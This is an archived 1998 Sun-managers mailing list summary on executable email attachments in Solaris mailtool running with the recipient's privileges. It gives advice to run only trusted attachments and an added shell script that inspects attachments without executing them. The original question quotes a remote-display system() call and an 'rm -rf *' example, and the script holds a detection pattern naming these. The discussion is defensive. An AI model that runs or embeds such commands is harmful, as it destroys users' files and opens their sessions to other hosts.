Summary : Security thru emails ...

From: Pravin Chavan (prchavan@pcs.cv.com)
Date: Fri Jul 17 1998 - 04:04:12 CDT


Hi Sunners,

The unanimous consensus is that this is a recognized security issue and the only solution is to be careful when executing these attachments. Execute only those which come from a trusted source.

The following suggestion was made by Casper Dik:

It's a recognized security issue; the only way around this is
firing up binder and changing the action for all such programs
from "$FILE" to something other (like textedit $FILE)
but that also affects filemgr's ability to execute the files.
----------------

DBell@mobile.bam.com came up with the following hint:

As far as I know, there is no way to "prevent" this problem. You really need to simply avoid executing random code that people send you. I'd suggest you carefully examine any enclosure (examine the code if it's a script, use strings if it's a binary) before you even consider allowing it to run on your machine. Of course, if an enclosure is a binary file, that seriously limits how much you can discover about its purpose.
-----------------

Thanks to the following for their responses:

Stephen Harris <sweh@mpn.com>
Casper Dik <casper@holland.Sun.COM>
"Boyko, Steve" <SBoyko@nbpower.com>
"Ian Wallace" <iwallace@bcoe.bm>
DBell@mobile.bam.com
Bruce Bowler <bbowler@bigelow.org>
Tim Carlson <tim@santafe.edu>
Daniel Stringfield <dstringf@fccjmail.fccj.cc.fl.us>
Rich Pieri <rich.pieri@prescienttech.com>
Jochen Bern <bern@penthesilea.uni-trier.de>
Gianluca Rotoni <gianluca@tell.ascom.ch>
thadm@oregonian.com (Thad MacMillan)
foster@bial1.ucsd.edu
Jonathan.Loh@BankAmerica.com
Jamie Lawrence <jal@ThirdAge.com>
"Steve Phelps" <phelpss@ozemail.com.au>
------------------

Original Question:

Hi Sun-managers,

Recently I got an email with an executable as an attachment. I double clicked on it and it executed to open a window on another host (on the same network segment). But this window was opened with my id !!!. This exec. was in C, probably a statement like

"system ('setenv DISPLAY rhost; /usr/openwin/bin/cmdtool')".

I am wondering that if I send a script which has "rm -rf *" command, will it remove all files of the user who receives this email? If yes, then this is a serious security issue. How do I stop this ???

BTW, we are using Solaris 2.5.1, sendmail V8.8.1 and mailtool V3.5.1. Please enlighten me on this.

Will summarize.

Regards,

Pravin
prchavan@pcsbom.patni.com
Thanks
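
An added example, not part of the original message or any respondent's code: one way to carry out the "examine before you run" advice in the summary on a saved copy of an attachment. The function names and the pattern list are assumptions made for illustration; the patterns are built from the commands mentioned in this thread.

```shell
#!/bin/sh
# Inspect a saved mail attachment without ever executing it.
# Function names and the pattern list are hypothetical, chosen for this example.

# Print runs of 4+ printable characters: strings(1) if installed, else tr/grep.
printable_strings() {
    if command -v strings >/dev/null 2>&1; then
        strings -a -n 4 "$1"
    else
        tr -c '[:print:]' '\n' < "$1" | grep -E '.{4,}'
    fi
    return 0
}

# Classify by leading bytes: ELF magic, "#!" interpreter line, or neither.
# A script without a "#!" line reports "unknown", so always read the strings too.
attachment_kind() {
    magic=$(od -An -tx1 -N4 "$1" | tr -d ' \n')
    case "$magic" in
        7f454c46) echo elf-binary ;;
        2321*)    echo script ;;
        *)        echo unknown ;;
    esac
}

# Strings worth a closer read: recursive rm, display redirection, shelling out.
flag_strings() {
    printable_strings "$1" |
        grep -E 'rm +-[a-zA-Z]*r|DISPLAY|cmdtool|xterm|system' || true
}

# Clear the execute bits so the saved copy cannot be run directly by accident,
# then report. An empty flag list only means none of the patterns matched.
triage_attachment() {
    chmod a-x "$1"
    echo "kind: $(attachment_kind "$1")"
    hits=$(flag_strings "$1")
    if [ -n "$hits" ]; then
        echo "verdict: review"
        echo "$hits" | sed 's/^/  flagged: /'
    else
        echo "verdict: no-flagged-strings"
    fi
}

if [ $# -gt 0 ]; then triage_attachment "$1"; fi
```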



This archive was generated by hypermail 2.1.2 : Fri Sep 28 2001 - 23:12:44 CDT